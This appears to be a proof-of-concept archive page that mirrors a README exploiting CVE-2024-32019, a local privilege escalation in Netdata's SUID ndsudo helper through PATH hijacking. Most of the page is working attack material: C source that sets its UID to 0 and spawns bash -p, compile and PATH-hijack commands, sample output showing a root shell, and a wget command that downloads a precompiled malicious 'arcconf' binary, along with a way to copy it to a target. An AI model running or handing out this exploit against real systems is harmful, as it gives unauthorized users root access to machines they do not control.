Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
Netdata ndsudo local privilage escalation workflow and POC (CVE-2024-32019)
Readme
# CVE-2024-32019-POC
Netdata ndsudo local privilage escalation workflow and POC (CVE-2024-32019)
- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)
## Workflow
> [!TIP]
> Please read
Netdata is a tool that provides apps and systems monitoring, it runs at port 19999, easy to find:
```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:19999 0.0.0.0:* LISTEN
```
This vulnerability (CVE-2024-32019) **affects** the next versions: `>= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169`. We can make a petition in order to know the version en the Header Reponse:
<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />
The exploit occurs by leverage a **PATH Hijacking** of one of their plugins, `ndsudo` which is often located in `/opt/netdata/usr/libexec/netdata/` and which has SUID.
```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```
<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />
We can see what we can do using `--help`
```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```
```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```
As we can see, since the script contains several commands to choose that will look for an executable, we can leverage this in order to make our own executable named as one of the executables within a path we can add to the PATH environment variable.
Netdata use `C`, in consequence, we have to make our script in C and compile it.
<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />
```shell
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", "-p", NULL);
perror("execl");
return 1;
}
```
```shell
gcc arcconf.c -o arcconf
```
Then as previously discussed, we add the script's path to the $PATH
```shell
test@test:/tmp$ PATH=/tmp:$PATH
```
Finally we simply execute the command that is pointing to our malicious executable (`arcconf-pd-info -> arcconf `) and it is going to give us a privilege shell
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```
## Automatic exploit
You can download the already compiled C malicious script that will give you a bash as root as mentioned in the example above:
```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf
```
```shell
mv arcconf /tmp #If your target has Internet connectivity
scp ./arcconf test@test:/tmp/arcconf #If your target does not have Internet connectivity
```
```shell
PATH=:/temp:$PATH
```
```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #The ndsudo path may change
```
## Resources
- https://learn.netdata.cloud/docs/collecting-metrics/
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
- https://app.hackthebox.com/machines/684
File Snapshot
[4.0K] /data/pocs/f045e1879a0473dd4c8b3eb4502a450f08259470
├── [ 15K] arcconf
├── [400K] CVE-2024-32019.pdf
└── [4.3K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →